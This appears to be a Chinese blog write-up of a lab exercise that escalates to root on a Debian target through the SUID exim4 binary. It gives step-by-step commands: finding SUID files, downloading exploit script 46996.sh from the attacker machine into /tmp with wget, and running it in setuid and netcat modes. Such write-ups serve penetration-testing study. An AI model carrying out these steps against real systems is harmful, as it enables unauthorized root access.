【主機滲透】記一次suid提權

環境:

攻擊機:192.168.110.128,kali 2020

目標機:192.168.110.131,Debian 4.9.51-1,已拿到shell

 

提權流程:

1、這裏主講提權,shell如圖:

2、首先看看有沒有 SUID 權限的可執行二進制文件,命令如下:

find / -type f -perm -u=s 2>/dev/null


發現exim4在使用時具有root權限,這可能是一個突破口(SUID可以讓調用者以文件擁有者的身份運行該文件,所以我們利用SUID提權的思路就是運行root用戶所擁有的SUID的文件,那麼我們運行該文件的時候就得獲得root用戶的身份了。)

3、在目標機上查閱exim4版本

exim4 --version

4、在攻擊機上查詢exim版本相關漏洞

發現一個含4.89版本的提權漏洞

5、看下腳本的利用方式,裏面介紹了有兩個使用方式

6、把提權腳本下載到目標機,這裏我通過python在攻擊機上開放了http服務,然後用wget下載到了目標機上

攻擊機:

python -m SimpleHTTPServer 8000

目標機:

wget http://192.168.110.128:8000/46996.sh 

這裏要注意先cd到/tmp目錄下,不然會提示權限不足

7、給腳本提升權限

chmod 777 46996.sh

8、執行提權命令

./46996.sh -m setuid
# 提權失敗

./46996.sh -m netcat
# 提權成功

注:這裏執行腳本可能會報錯:bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory,這是因爲腳本文件的格式引起的,只需把其結束符替換就可,執行:sed -i -e 's/\r$//' 46996.sh

 

參考鏈接:

https://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247484570&idx=4&sn=a4b8329f9988e82f248470b83de89dda&chksm=fa76cbeacd0142fc043d7eb368b8b3d1018c3ba11b4c0e0b7829a07e5085336aa3c56e0844b8&mpshare=1&scene=24&srcid=&sharer_sharetime=1581947754047&sharer_shareid=e6da78306a46a9704dbd1e2c3d8cbdb8#rd

https://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247484826&idx=4&sn=147939476b9cc099611f9b4d8ccf2487&chksm=fa76caeacd0143fcc7d0a647aa700b5f4fca1b4167a7684d97d0b621028b80e894c787c177bc&mpshare=1&scene=24&srcid=&sharer_sharetime=1583118647801&sharer_shareid=e6da78306a46a9704dbd1e2c3d8cbdb8#rd

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章